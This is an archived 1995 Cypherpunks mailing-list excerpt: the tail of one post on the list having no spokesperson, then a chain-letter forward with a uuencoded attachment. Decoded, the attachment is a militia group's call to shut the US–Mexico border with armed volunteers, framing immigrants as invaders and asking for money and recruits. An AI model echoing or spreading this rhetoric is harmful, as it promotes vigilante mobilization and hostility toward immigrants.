"official" viewpoint which a spokesperson could help
articulate.  They didn't, we don't and, frankly, that's the
way I like it.

You want to express your views to the press?  Knock yourself
out.  You want to call yourself a "Cypherpunk"?  No one will
stop you.  You want to characterize what other Cypherpunks
say and believe?  You might say something I disagree with,
but again, no one will stop you.  (Of course, they may counter
your free speech with some free speech of their own, but that's
the name of the game.)

Yours in anarchy,


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "FELIX R. WILSON SR." <ASICEO@internetMCI.COM>
Date: Sat, 30 Sep 95 07:22:21 PDT
To: "lindat@iquest.net>
Subject: Re: Operation Stop The Aliens
Message-ID: <01HVVTH9ORWY8ZEKWD@MAILSRV1.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: FELIX R. WILSON SR. * EMC.Ver #2.3 ] --
 Attachment: natltr.txt Code: 00H7GFL   \ Created: 09-29-95, 06:21 PM [34 Kb]

The Attached File Is For Viewing; It Is In Text Format. Please Forward To
Everyone on the network, and post to every board. "Please.."
//BEGIN BINARY MAIL SEGMENT:
begin 644 natltr.txt
M9R!B86-K('1O('1H92!S=7)F86-E('=I=&@@=&5C:&YO;&]G>2!S=69F:6-I
M96YT;'D-"B`@("`@("`@("`@("`@("!A9'9A;F-E9"!T;R!D96-I9&4@:68@
M<VAO96QA8V5S(&%R92!T:65D(&)Y(&$@;&5F="!H86YD960@;W(@<FEG:'0@
M:&%N9&5D#0H@("`@("`@("`@("`@("`@<&5R<V]N("XN+B!T:&4@;VYE(&-A
M<&%B;&4@;V8@8V]M<&QE=&5L>2!A;FYI:&EL871I;F<@=VAO;&4@8VET:65S
M(&%N9`T*("`@("`@("`@("`@("`@(&-O=6YT<FEE<R!W:71H('1H92!P=7-H
M(&]F(&$@8G5T=&]N("XN+B!T:&%T('1H:7,@;6]S="!P;W=E<F9U;"!C;W5N
M=')Y(&-A;@T*("`@("`@("`@("`@("`@(&YO="!S=&]P('1H92!F;&]W(&]F
M(&1R=6=S(&%N9"!I;&QE9V%L('!E<G-O;G,@9G)O;2!C<F]S<VEN9R!C=7(@
M<V]V97)E:6=N#0H@("`@("`@("`@("`@("`@8F]R9&5R<R!I<R!D:69F:6-U
M;'0@=&\@8F5L:65V97(-"@T*("`@("`@("`@("`@("`@(%=%(%1(12!014]0
M3$4@87)E('!R97!A<F5D('1O('-T86YD(&%T('1H:7,@=&EM92X@(%=E(&1O
M(&YO="!I;G1E;F0@=&\@<VET#0H@("`@("`@("`@("`@("`@:61L>2!B>2!W
M:&EL92!T:&]S92!T:&%T('=O=6QD(&1E<W1R;WD@=&AI<R!C;W5N=')Y("AB
M>2!M96%N<R!O9@T*("`@("`@("`@("`@("`@('1R869F:6-K:6YG(&EN(&1R
M=6=S*2!C;VYT:6YU92!T;R!I;G9A9&4@=7,N#0H-"B`@("`@("`@("`@("`@
M("!,861I97,@86YD($=E;G1L96UE;BP@1F5L;&]W($-O=6YT<GEM96XL(%=E
M(&YO=R!I;G1R;V1U8V4@=&\@>6]U("T-"B`@("`@("`@("`@("`@("`B3W!E
M<F%T:6]N.B!0<F]T96-T($%M97)I8V$B+BXN#0H-"B`@("`@("`@("`@("`@
M("`@("`@270@:7,@=&AE(&EN=&5N=&EO;B!O9B!712!42$4@4$5/4$Q%(&]F
M('1H97-E(%5N:71E9"!3=&%T97,L(&]N#0H@("`@("`@("`@("`@("`@("`@
M($9E8G)U87)Y(#`Q+"`Q.3DV+"!T;R!E;&5C=&EV96QY(&%N9"!P97)M86YE
M;G1L>2!S:'5T('1H92!S;W5T:&5R;@T*("`@("`@("`@("`@("`@("`@("!S
M;W9E<F5I9VX@8F]R9&5R(&]F('1H92!5;FET960@4W1A=&5S('1O($%,3"`B
M24Q,14=!3"!%3E1262(@;V8@86YY#0H@("`@("`@("`@("`@("`@("`@(&ET
M96US(&]R('!E<G-O;G,N#0H-"B`@("`@("`@("`@("`@("`@("`@5T4@5$A%
M(%!%3U!,12P@=&AE(%5N;W)G86YI>F5D($UI;&ET:6$@*&%S(&1E9FEN960@
M8GD@;&%W("T@06UE;F1M96YT#0H@("`@("`@("`@("`@("`@("`@(#(@;V8@
M=&AE(%53($-O;G-T:71U=&EO;BP@5$E43$4@,2`P(%530R!396-T:6]N(#,Q
M(#$L(&%N9"!T:&4@0V%L:69O<FYI80T*("`@("`@("`@("`@("`@("`@("!-
M:6QI=&%R>2!A;F0@5F5T97)A;G,@0V]D92!396-T:6]N<R`Q,C`@=&AR;W5G
M:"`Q,C(I(&%R92!P<F5P87)E9"!T;PT*("`@("`@("`@("`@("`@("`@("!A
M8V-O;7!L:7-H('1H:7,@86-T:6]N+"!I;B!T:&4@979E;G0@8W5R(&=O=F5R
M;FUE;G0@96UP;&]Y965S(&1O(&YO=`T*("`@("`@("`@("`@("`@("`@("!S
M964@9FET('1O(&-A<G)Y(&]U="!T:&5I<B!D=71I97,@=6YD97(@=&AE($-O
M;G-T:71U=&EO;B!O9B!T:&ES(%5N:6]N#0H@("`@("`@("`@("`@("`@("`@
M(&%N9"!T:&4@9'5E('!R;V-E<W,@;V8@4&]P=6QA<B!6;W1E+"!A<R!E=FED
M96YC960@8GD@4')O<&]S:71I;VX@,3@W#0H@("`@("`@("`@("`@("`@("`@
M(')E8V5N=&QY(&5N86-T960@=VET:&EN('1H92!S=&%T92!297!U8FQI8R!O
M9B!#86QI9F]R;FEA+@T*#0H@("`@("`@("`@("`@("`@5V4@87)E(&%S:VEN
M9R!A;'-O+"!T:&%T('1H92!-97AI8V%N(&=O=F5R;FUE;G0@<&%R=&EC:7!A
M=&4@:6X@<VAU='1I;F<-"B`@("`@("`@("`@("`@("!T:&5I<B!3;W9E<F5I
M9VX@0F]R9&5R('1O($%,3"`B24Q,14=!3"!%6$E4(B!O9B!A;GD@:71E;7,@
M;W(@<&5R<V]N<R!F<F]M#0H@("`@("`@("`@("`@("`@=&AE:7(@8V]U;G1R
M>2!I;G1O('1H97-E(%5N:71E9"!3=&%T97,N#0H-"B`@("`@("`@("`@("`@
M("!4:&4@4')E<VED96YT(&AA<R!R96-E;G1L>2!S=&%T960@:&4@=VEL;"`G
M87!P<F]P<FEA=&4G(&%N(&%D9&ET:6]N86P-"B`@("`@("`@("`@("`@("!"
M:6QL:6]N(&]R('-O(&1O;&QA<G,@*&-U<B!D;VQL87)S*2!T;R!S;&]W(&1O
M=VX@=&AE(&9L;W<@;V8@:6QL96=A;"!I=&5M<PT*("`@("`@("`@("`@("`@
M(&%N9"!P97)S;VYS(&EN=&\@=&AI<R!C;W5N=')Y+@T*#0H@("`@("`@("`@
M("`@("`@4W!E;F1I;F<@;V8@861D:71I;VYA;"!T87@@9&]L;&%R<R!T;R!M
M97)E;'D@<VQO=R!D;W=N('1H92!F;&]W(&ES#0H@("`@("`@("`@("`@("`@
M54Y!0T-%4%1!0DQ%('1O('1H92!S;W9E<F5I9VX@8VET:7IE;G,@;V8@=&AE
M('-T871E(%)E<'5B;&EC(&]F($-A;&EF;W)N:6$-"B`@("`@("`@("`@("`@
M("!A;F0@=&AE(&]T:&5R(')E<'5B;&EC<R!A;&]N9R!T:&4@<V]U=&AE<FX@
M8F]R9&5R+@T*#0H@("`@("`@("`@("`@("`@5T4@5$A%(%!%3U!,12!H879E
M('1H92!C87!A8FEL:71I97,@=&\@<W1O<"`M+2!N;W0@<VEM<&QY('-L;W<@
M9&]W;B`M+2!35$]0#0H@("`@("`@("`@("`@("`@0T]-4$Q%5$5,62!T:&4@
M9FQO=R!O9B!I;&QE9V%L(&1R=6=S(&%N9"!I;&QE9V%L(&EM;6EG<F%T:6]N
M(&EN=&\@=&AE<V4-"B`@("`@("`@("`@("`@("!5;FET960@4W1A=&5S('1H
M<F]U9V@@=&AE('-O=71H97)N(&)O<F1E<B$@4&5R;6%N96YT;'DA($%N9"!W
M92!I;G1E;F0@:70-"B`@("`@("`@("`@("`@("!T;R!B92!D;VYE+@T*#0H@
M("`@("`@("`@("`@("`@5V4@87)E(&AE<F4@=&\@9F]R;6%L;'D@;V9F97(@
M8W5R(&%S<VES=&%N8V4@+2T@=&AR;W5G:"!C=7(@8V]M;6ET;65N="!T;PT*
M#0H,("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
M("`@("`@("`@("`@("!&<F]M.B!$96%N($-O;7!T;VX@("`@("`@("`@("`@
M("`@("`@("`@("`@("`Y+S(Y+SDU("`Q-CHP-SHU-"`@4&%G92`X(&]F(#$R
M#0I.051)3TY!3"!!3$Q)04Y#12!/1B!#2%))4U1)04X@34E,251)00T*#0H-
M"@T*#0H-"@T*#0H@("`@("`@("`@("`@("`@5T4@5$A%(%!%3U!,12!O9B!T
M:&5S92!5;FET960@(%-T871E<R`@86YD("!E86-H("!O9B`@=&AE("!S979E
M<F%L("!S;W9E<F5I9VX-"B`@("`@("`@("`@("`@("!S=&%T92!297!U8FQI
M8W,N#0H-"B`@("`@("`@("`@("`@("!712!42$4@4$5/4$Q%('=I;&P@87-S
M:7-T(&QA=R!E;F9O<F-E;65N="!O9F9I8VEA;',L("!U;F1E<B`@=&AE:7(@
M(&1I<F5C=&EO;@T*("`@("`@("`@("`@("`@(&%N9"!C;VUM86YD;R!W:71H
M('1H92!S;VQE(&EN=&5N=&EO;B!O9B!S:'5T=&EN9R!T:&4@8F]R9&5R(&)E
M='=E96X@=&AE#0H@("`@("`@("`@("`@("`@56YI=&5D(%-T871E<R!A;F0@
M365X:6-O('1O($%,3"!)3$Q%1T%,($-23U-324Y'4TD-"@T*("`@("`@("`@
M("`@("`@($%S:R!,87<@16YF;W)C96UE;G0[('1H97D@=VEL;"!T96QL('EO
M=2!T:&5Y(&%R92!F:6=H=&EN9R!A(&YE=F5R(&5N9&EN9PT*("`@("`@("`@
M("`@("`@(&)A='1L92!A9V%I;G-T('1H:7,@:6YV87-I;VXN("!712!42$4@
M4$5/4$Q%(&1O(&YO="!I;G1E;F0@=&\@86QL;W<@86YO=&AE<@T*("`@("`@
M("`@("`@("`@(&QO<W0@8F%T=&QE(&9O<B!T:&ES(&-O=6YT<GDN#0H-"B`@
M("`@("`@("`@("`@("!,861I97,@86YD($=E;G1L96UE;BP@1F5L;&]W($-O
M=6YT<GEM96XL('1H97)E(&%R92!T;V\@;6%N>2!L:79E<R!A="!S=&%K90T*
M("`@("`@("`@("`@("`@(&EN('1H:7,@8F%T=&QE('1O(&%L;&]W(&%N;W1H
M97(@;&]S<RX-"@T*("`@("`@("`@("`@("`@(%!O;&ET:6-I86YS('=I;&P@
M<&]N9&5R('1H:7,@<')O8FQE;2!F;W(@86YO=&AE<B`R,"!Y96%R<R!W:&EL
M92!C=7(@<V]N<PT*("`@("`@("`@("`@("`@(&%N9"!D875G:'1E<G,@9&EE
M(&]N('1H92!S=')E971S+"!O<B!D:64@:6X@=&AE:7(@<V]U;',L(&%N9"!H
M879E('1H96ER#0H@("`@("`@("`@("`@("`@9G5T=7)E<R!D97-T<F]Y960@
M8GD@=&AE(&5V:6QS(&]F(&1R=6=S(&%N9"!T:&4@;F5V97(@96YD:6YG(&9L
M;W<@;V8@=&%X#0H@("`@("`@("`@("`@("`@9&]L;&%R<R`H1$5"5"!!1T%)
M3E-4(%1(14E2($955%5215,I('=H:6-H(&ES(&-H86YN96QE9"!I;G1O('1H
M92!F961E<F%L#0H@("`@("`@("`@("`@("`@8V]F9F5R<RX-"@T*("`@("`@
M("`@("`@("`@(%1H92!S;W5T:&5R;B!54R]-15A)0T\@8F]R9&5R("!I<R`@
M87!P<F]X:6UA=&5L>2`@,38P,"`@;6EL97,@(&QO;F<N("!/;FQY("!A#0H@
M("`@("`@("`@("`@("`@=F5R>2!S;6%L;"!P97)C96YT86=E(&]F('1H870@
M;6EL86=E(&ES(&9E;F-E9"X-"@T*("`@("`@("`@("`@("`@(%=H96YE=F5R
M('1H92!L:6UI=&5D($)O<F1E<B!0871R;VPO3&%W($5N9F]R8V5M96YT('!E
M<G-O;FYE;"!M;W9E('1O(&$@:&]T#0H@("`@("`@("`@("`@("`@<W!O="P@
M=&AE(&-R:6UI;F%L<R!M;W9E('1O(&%N('5N<')O=&5C=&5D(&%R96$@;V8@
M=&AE(&)O<F1E<BX-"@T*("`@("`@("`@("`@("`@(%1H92!C<FEM:6YA;',@
M:VYO=R!W:&%T(&ES(&=O:6YG(&]N+"!T:&4@0F]R9&5R(%!A=')O;"!K;F]W
M<R`@=VAA="`@:7,@(&=O:6YG#0H@("`@("`@("`@("`@("`@;VXN($ET('-E
M96US('1H92!O;FQY('!E;W!L92!T:&%T(&1O(&YO="!K;F]W('=H870@:7,@
M9V]I;F<@;VX@:7,@8W5R#0H@("`@("`@("`@("`@("`@9V]V97)N;65N="!E
M;7!L;WEE97,N("!"=70L('1H97D@<VAO=6QD(&MN;W<L("AA;F0@:68@>6]U
M(&QO;VL@8VQO<V5L>2D-"B`@("`@("`@("`@("`@("!T:&5Y(&1O(&MN;W<N
M#0H-"B`@("`@("`@("`@("`@("!!9G1E<B!A;&PL('1H92!'04\@<F5P;W)T
M('1H870@:7,@<')E<V5N=&5D(&AE<F4@=&\@>6]U('1O9&%Y(&ES('1H92!E
M>&%C=`T*("`@("`@("`@("`@("`@(')E<&]R="!P<F5S96YT960@=&\@0V]N
M9W)E<W,@:6X@1&5C96UB97(@;V8@;&%S="!Y96%R+@T*#0H@("`@("`@("`@
M("`@("`@270@:7,@;V)V:6]U<R!E=F5N('1O('1H92!C87-U86P@;V)S97)V
M97(@=&AA="!T:&ES(&]P97)A=&EO;B!W:6QL('!R97-E;G0-"B`@("`@("`@
M("`@("`@("!A(&QO9VES=&EC<R!P<F]B;&5M+B`@270@:7,@8W5R(&AO<&4L
M(&%N9"!C=7(@<')A>65R+"!T:&%T(&%L;"!P871R:6]T:6,-"B`@("`@("`@
M("`@("`@("!!;65R:6-A;G,L(&)E('1H97D@8G5S:6YE<W-E<R!O<B!S:6UP
M;'D@2F]H;B!$;V4@;VX@=&AE(&%S<V5M8FQY(&QI;F4L('=I;&P-"B`@("`@
M("`@("`@("`@("!J;VEN(&EN('1H:7,@969F;W)T('=I=&@@=7,L('1O(&1E
M9F5N9"!C=7(@8VAI;&1R96X@86YD(&YE:6=H8F]R<RP@8W5R#0H@("`@("`@
M("`@("`@("`@:&]M97,@86YD(&-U<B!C;W5N=')Y+@T*#0H@("`@("`@("`@
M("`@("`@26X@;W)D97(@=&\@<'5T('1H;W5S86YD<R!O9B!P96]P;&4@=&]G
M971H97(@:6X@=&AE(&YU;65R;W5S("!P;W-I=&EO;G,@('1H870-"B`@("`@
M("`@("`@("`@("!S=6-H(&%N(&]P97)A=&EO;B!E;G1A:6QS("TM(&)E('1H
M97D@9G)O;G0@;&EN92!F;W)C97,L('-U<'!L>2!C;&5R:W,L#0H@("`@("`@
M("`@("`@("`@;65D:6-S+"!C;V]K<RP@;65C:&%N:6-S+"!T<G5C:R!D<FEV
M97)S+"!A;F0@;VX@86YD(&]N("TM('=I;&P@<F5Q=6ER90T*("`@("`@("`@
M("`@("`@(&-O;6UI=&UE;G0@9G)O;2!A;&P@;V8@=7,@=&\@9&5F96YD(&-U
M<B!C;W5N=')Y+@T*#0H@("`@("`@("`@("`@("`@5V4@9&\@;F]T(&MN;W<@
M:68@=&AE<F4@87)E(&%N>2!L87)G92!P871R:6]T:6,@8V]R<&]R871I;VYS
M(&QE9G0@:6X-"B`@("`@("`@("`@("`@("!!;65R:6-A+B`@5V4@87)E(&%S
M:VEN9R!F;W(@=&AE:7(@9FEN86YC:6%L('-U<'!O<G0N("!097)H87!S('1H
M97D@:&%V92!A;&P-"B`@("`@("`@("`@("`@("!G:79E;B!I;B!T;R!T:&4@
M=&5M<'1A=&EO;B!O9B!C:&5A<"!F;W)E:6=N(&QA8F]R+B`@0G5T+"!W92!W
M:6QL(&9I;F0@;W5T+@T*#0H@("`@("`@("`@("`@("`@5V4@87)E(&%L<V\@
M87-K:6YG(&QA8F]R("AB;W1H(&EN9&EV:61U86P@86YD('5N:6]N*2!F;W(@
M=&AE:7(@<W5P<&]R="X-"@T*("`@("`@("`@("`@("`@($]N92!T:&EN9R!M
M=7-T(&)E('-A:60@86)O=F4@86QL(&5L<V4@5T4@5$A%(%!%3U!,12!W:6QL
M(&YO="!T;VQE<F%T90T*("`@("`@("`@("`@("`@(&)E8V]M:6YG(&$G=&AI
M<F0@=V]R;&0G(&-O=6YT<GD@:6X@82`B3F5W(%=O<FQD($]R9&5R(BX@($D@
M<V%Y('1H:7,@=&\@04Q,#0H-"@P@("`@("`@("`@("`@("`@("`@("`@("`@
M("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@($9R;VTZ($1E
M86X@0V]M<'1O;B`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`Y+S(Y
M+SDU("`Q-CHP.#HS,B`@4&%G92`Y(&]F(#$R#0I.051)3TY!3"!!3$Q)04Y#
M12!/1B!#2%))4U1)04X@34E,251)00T*#0H-"@T*#0H-"@T*#0H@("`@("`@
M("`@("`@("`@("`@=&AO<V4@8VET:7IE;G,@=VAO(&MN;W<@=&AE:7(@:&5R
M:71A9V4@86YD(')E9G5S92!T;R`@;&5T("!I="`@<&%S<R`@:6YT;R`@=&AE
M#0H@("`@("`@("`@("`@("`@("`@86YN=6QS(&]F(&AI<W1O<GDN#0H-"B`@
M("`@("`@("`@("`@("`@("!4:&5R92!W87,@82!T:6UE('=H96X@1V]D('-H
M960@:&ES(&UA;GD@8FQE<W-I;F=S(&%N9"!M97)C>2!U<&]N('1H:7,@9W)E
M870-"B`@("`@("`@("`@("`@("`@("!C;W5N=')Y+B`@2&4@(&)L97-S960@
M(&ET("!B96-A=7-E("!T:&4@('!E;W!L92`@=V5R92`@9&5C96YT("!A;F0@
M(&AO;F5S="P-"B`@("`@("`@("`@("`@("`@("!H87)D=V]R:VEN9RP@86YD
M($=O9"!F96%R:6YG+B`@5VAE;B!T:&4@8VAI<',@=V5R92!D;W=N+"!T:&5Y
M('=E<F4@=VEL;&EN9PT*("`@("`@("`@("`@("`@("`@('1O('-T86YD(&9O
M<B!W:&%T(&ES(')I9VAT+B`@3F]T(&9O<B!M;VYE>2!O<B!P;W=E<B!O<B`@
M9VQO<GDL("!B=70L("!F;W(@('=H870-"B`@("`@("`@("`@("`@("`@("!W
M87,@86YD('-T:6QL(&ES(')I9VAT;`T*#0H@("`@("`@("`@("`@("`@("`@
M3&%D:65S(&%N9"!'96YT;&5M96XL($9E;&QO=R!#;W5N=')Y;65N+"!W92!S
M=&%N9"!B969O<F4@>6]U(&AE<F4@;F]T(&%S#0H@("`@("`@("`@("`@("`@
M("`@9W)E870@9V5N97)A;',@;W(@9W)E870@;&5A9&5R<RP@8G5T+"!S:6UP
M;'D@87,@5T4@5$A%(%!%3U!,12X@(%=E(&%R92!T:&4-"B`@("`@("`@("`@
M("`@("`@("!S86UE('!E;W!L92!W:&\@:&%V92!B965N(&]V97)B=7)D96YE
M9"!W:71H('1A>&5S("AS<&5N="!O;B`G9G)I=F]L;W5S)PT*("`@("`@("`@
M("`@("`@("`@(&UA='1E<G,I(&IU<W0@87,@>6]U(&AA=F4@8F5E;BP@=&AE
M('-A;64@<&5O<&QE('=H;R!H879E(&)E96X@<FED:6-U;&5D#0H@("`@("`@
M("`@("`@("`@("`@86YD(&UO8VME9"!B>2!T:&]S92!I;B!T:&4@=V]R;&0@
M=&AA="!A<F4@:F5A;&]U<R!O9B!T:&4@8FQE<W-I;F=S($=O9"!H87,-"B`@
M("`@("`@("`@("`@("`@("!G<F%N=&5D('5S(&)Y($AI<R!-97)C>2P@:G5S
M="!A<R!Y;W4@:&%V92!B965N+"!W92!A<F4@=&AE('-A;64@<&5O<&QE('=H
M;PT*("`@("`@("`@("`@("`@("`@(&1I960@:6X@=&AE(%)E=F]L=71I;VX@
M+2T@=&AE(%=A<B!O9B`Q.#$R+"!T:&4@0VEV:6P@5V%R+"!75TDL(%=724DL
M($MO<F5A+`T*("`@("`@("`@("`@("`@("`@(%9I970@3F%M+"!A;F0@=&AE
M($=U;&8@5V%R+@T*#0H@("`@("`@("`@("`@("`@("`@5V4@87)E(&YO="!D
M:69F97)E;G0@9G)O;2!Y;W4@+BXN('=E($%212!93U4A(%=%(%1(12!014]0
M3$4A#0H-"B`@("`@("`@("`@("`@("`@("!4;R!B92!P97)F96-T;'D@:&]N
M97-T+"`@=&AE("!P<F]B;&5M<R`@9F%C:6YG("!U<R`@=&]D87D@(&%R92`@
M3D]4("!S:6UP;'D@(&$-"B`@("`@("`@("`@("`@("`@("!R97-U;'0@;V8@
M<&]L:71I8VEA;G,N("!4:&%T)W,@=&]O(&5A<WD@;V8@86X@86YS=V5R+"!I
M="=S("!T;V\@(&UU8V@@(&]F("!A#0H@("`@("`@("`@("`@("`@("`@8V]P
M+6]U="X-"@T*("`@("`@("`@("`@("`@("`@(%1H97-E('!R;V)L96US(&9A
M8VEN9R!U<R!A<F4@9'5E('1O($]54B!E<G)O<G,@+2T@5T4@5$A%(%!%3U!,
M12X@($)Y#0H@("`@("`@("`@("`@("`@("`@86QL;W=I;F<@=&AE('!O;&ET
M:6-I86YS('1O('-H:7)K('1H96ER("!C;VYS=&ET=71I;VYA;"`@<F5S<&]N
M<VEB:6QI=&EE<R`@86YD#0H@("`@("`@("`@("`@("`@("`@9'5T:65S("TM
M(&%N9"!A;&QO=VEN9R!T:&5M('1O("!S=&5P("!B97EO;F0@('1H96ER("!C
M;VYS=&ET=71I;VYA;"`@875T:&]R:71Y#0H@("`@("`@("`@("`@("`@("`@
M+2T@=V4@:&%V92!S:&ER:V5D($]54B!R97-P;VYS:6)I;&ET:65S(&%N9"!D
M=71I97,N#0H-"B`@("`@("`@("`@("`@("`@("!997,N+BX@=V4@:&%V92!A
M;&QO=V5D(&ET+B`@0G5T+"!I="!I<R!T:6UE(&ET(&)E('-T;W!P960N#0H-
M"B`@("`@("`@("`@("`@("`@("!,861I97,@86YD($=E;G1L96UE;BP@1F5L
M;&]W($-O=6YT<GEM96XL(&ET(&ES(&YO=R!T:6UE('1O(%!55"!54"!O<B!3
M2%54#0H@("`@("`@("`@("`@("`@("`@55!)#0H-"B`@("`@("`@("`@("`@
M("`@("!792!C86X@86QL(&%G<F5E('1H870@=VAE;B`@<&5O<&QE("!E;G1E
M<B`@=&AI<R`@8V]U;G1R>2`@:70@('-H;W5L9"`@8F4@(&1O;F4-"B`@("`@
M("`@("`@("`@("`@("!,05=&54Q,62X@(%=E("!C86X@(&%L;"`@86=R964@
M('1H870@('1H;W-E("!W:&\@("!W;W5L9"`@(&)R:6YG("`@9&5A=&@@("!A
M;F0-"B`@("`@("`@("`@("`@("`@("!D97-T<G5C=&EO;B!T;R!C=7(@;&%N
M9"!F<F]M(&9O<F5I9VX@;&%N9',@;75S="!B92!S=&]P<&5D+@T*#0H@("`@
M("`@("`@("`@("`@("`@270@:7,@=&EM92!T;R!S=&%N9"X@($EF('=E(&1O
M(&YO="!S=&%N9"!N;W<L("!W92`@=VEL;"`@8F4@('-U8FIE8W1E9"`@=&\@
M('1H90T*("`@("`@("`@("`@("`@("`@('1Y<F%N;GD@;V8@9F5A<B!F;W(@
M979E<BX@($9E87(@;V8@8W)I;64N("!&96%R(&]F(&1E871H+B`@1F5A<B!O
M9B!T:&4-"B`@("`@("`@("`@("`@("`@("!G;W9E<FYM96YT('1H870@:7,@
M<W=O<FX@=&\@<')O=&5C="!U<RP@8G5T(&-H;V]S97,@;F]T('1O+B`@1F5A
M<B!F;W(@8W5R#0H@("`@("`@("`@("`@("`@("`@8VAI;&1R96YS)R!F=71U
M<F5S+B`@1F5A<B!O9B!C=7(@1T]$)W,@=W)A=&AL#0H-"B`@("`@("`@("`@
M("`@("`@("!)<R!I="!W;W)T:"!H:61I;F<@9G)O;2!T:&4@=')U=&@@+BXN
M(&]R(&%R92!Y;W4@(')E861Y("!T;R`@8F4@(&%N("!!;65R:6-A;C\-"B`@
M("`@("`@("`@("`@("`@("!7:6QL('EO=2!L:79E(&EN(&9E87(_($]R('=I
M;&P@>6]U(&QI=F4@:6X@=&AE(&QI9VAT(&]F(&QI8F5R='D@=&AA="`@8V]M
M97,-"B`@("`@("`@("`@("`@("`@("!F<F]M('-T86YD:6YG('5P(&9O<B!W
M:&%T(&ES(')I9VAT("TM(&%N9"!F:71T:6YG(&EN('1H92!S:6=H="!O9B!'
M3T1)#0H-"B`@("`@("`@("`@("`@("`@("!);B!C;&]S:6YG+"!L970@=7,@
M<&]N9&5R('1H:7,@<75O=&4@9G)O;2!386UU96P@061A;7,@*#$@-S<U*2!L
M;VYG(&AI9&1E;@T*("`@("`@("`@("`@("`@("`@(&EN('1H92!D=7-T(&]F
M('1H92!A<F-H:79E<R!O9B!C=7(@:&5R:71A9V4N("!)="!I<R!F:71T:6YG
M(&%N9"`@<')O<&5R+B`@270-"B`@("`@("`@("`@("`@("`@("!I<R!N96-E
M<W-A<GD@+2T@9F]R('5S+"!712!42$4@4$5/4$Q%("TM('1O('5N9&5R<W1A
M;F0@=VAA="!I<R!H86YG:6YG(&EN#0H@("`@("`@("`@("`@("`@("`@=&AE
M(&)A;&%N8V4-"@T*#"`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
M("`@("`@("`@("`@("`@("`@("`@("`@("`@1G)O;3H@1&5A;B!#;VUP=&]N
M("`@("`@("`@("`@("`@("`@("`@("`@("`@(#DO,CDO.34@(#$V.C`Y.B`Q
M(#`@(%!A9V4@,2`P(&]F(#$R#0I.051)3TY!3"!!3$Q)04Y#12!/1B!#2%))
M4U1)04X@34E,251)00T*#0H-"@T*#0H-"@T*#0H@("`@("`@("`@("`@("`@
M("`@("`@(DE&(%E%($Q/5D4@5T5!3%1(($)%5"U&15(@5$A!3B!,24)%4E19
M+"!42$4@5%)!3E%524Q)5%D@3T8@4T525DE4541%#0H@("`@("`@("`@("`@
M("`@("`@("`@0D54+49%4B!42$%.(%1(12!!3DE-051)3D<@0T].5$535"!/
M1B!&4D5%1$]-+"!'3R!(3TU%($923TT@55,@24X-"B`@("`@("`@("`@("`@
M("`@("`@("!014%#12X@(%=%($%32R!.3U0@64]54B!#3U5.4T5,4R!/4B!9
M3U52($%235,N("!#4D]50T@@1$]73B!!3D0@3$E#2PT*("`@("`@("`@("`@
M("`@("`@("`@(%1(12!(04Y$4R!42$%4($9%140@64]5+B`@34%9(%E/55(@
M0TA!24Y3(%-%5"!,24=(5$Q9(%503TX@64]5($%.1"!-05D-"B`@("`@("`@
M("`@("`@("`@("`@("!03U-415))5%D@("`@($9/4D=%5"`@("`@5$A!5"`@
M("`@644@("`@(%=%4D4@("`@($]54B`@("`@0T]53E1264U%3BXB#0H-"@T*
M("`@("`@("`@("`@("`@("`@3F]W+"!)('=O=6QD(&QI:V4@=&\@=&%K92!T
M:&ES(&]P<&]R='5N:71Y('1O(&%D9')E<W,@82!F97<@(&]F("!T:&4@(&UO
M<F4-"B`@("`@("`@("`@("`@("`@(&-O;6UO;B!Q=65S=&EO;G,@=&AA="!W
M92!A;G1I8VEP871E('EO=2!W:6QL(&AA=F4@<F5G87)D:6YG('1H:7,@;6%T
M=&5R+@T*#0H@("`@("`@("`@("`@("`@("!4:&4@9FER<W0@<75E<W1I;VX@
M=&AE;B!I<R`B5VAO(&ES('1H92!-:6QI=&EA/R(@5&AE(")M:6QI=&EA(B!I
M<R`@9&5F:6YE9`T*("`@("`@("`@("`@("`@("`@:6X@=&AE(&QA=R!A<R!F
M;VQL;W=S#0H-"B`@("`@("`@("`@("`@("`@("`@("!4:&4@0V%L:69O<FYI
M82!-:6QI=&%R>2!A;F0@5F5T97)A;G,@0V]D92!396-T:6]N<R`Q,C`M,3(R
M(')E860@87,-"B`@("`@("`@("`@("`@("`@("`@("!F;VQL;W=S#0H-"B`@
M("`@("`@("`@("`@("`@("`@("`B5&AE(&UI;&ET:6$@;V8@=&AE(%-T871E
M('-H86QL(&-O;G-I<W0@;V8@=&AE($YA=&EO;F%L("!'=6%R9"P@(%-T871E
M#0H@("`@("`@("`@("`@("`@("`@("`@36EL:71A<GD@4F5S97)V92!A;F0@
M=&AE($YA=F%L($UI;&ET:6$@+2T@=VAI8V@@8V]N<W1I='5T92!T:&4@(&%C
M=&EV90T*("`@("`@("`@("`@("`@("`@("`@(&UI;&ET:6$@+2T@86YD('1H
M92!53D]21T%.25I%1"!-24Q)5$E!+B(-"@T*("`@("`@("`@("`@("`@("`@
M("`@(")4:&4@54Y/4D=!3DE:140@34E,251)02!C;VYS:7-T<R!O9B!!3$P@
M<&5R<V]N<R!L:6%B;&4@=&\@<V5R=FEC92!I;@T*("`@("`@("`@("`@("`@
M("`@("`@('1H92!M:6QI=&EA(&)U="!.3U0@($U%34)%4E,@(&]F("!T:&4@
M($YA=&EO;F%L("!'=6%R9"`@;W(@('1H92`@3F%V86P-"B`@("`@("`@("`@
M("`@("`@("`@("!-:6QI=&EA+B(-"@T*("`@("`@("`@("`@("`@("`@("`@
M(")4:&4@;6EL:71I82!O9B!T:&4@4W1A=&4@8V]N<VES=',@;V8@04Q,("!A
M8FQE+6)O9&EE9"`@;6%L92`@8VET:7IE;G,-"B`@("`@("`@("`@("`@("`@
M("`@("!A;F0@86QL(&]T:&5R(&%B;&4M8F]D:65D(&UA;&5S('=H;R!H879E
M(&1E8VQA<F5D('1H96ER(&EN=&5N=&EO;B!T;PT*("`@("`@("`@("`@("`@
M("`@("`@(&)E8V]M92!C:71I>F5N<R!O9B!T:&4@56YI=&5D(%-T871E<R!W
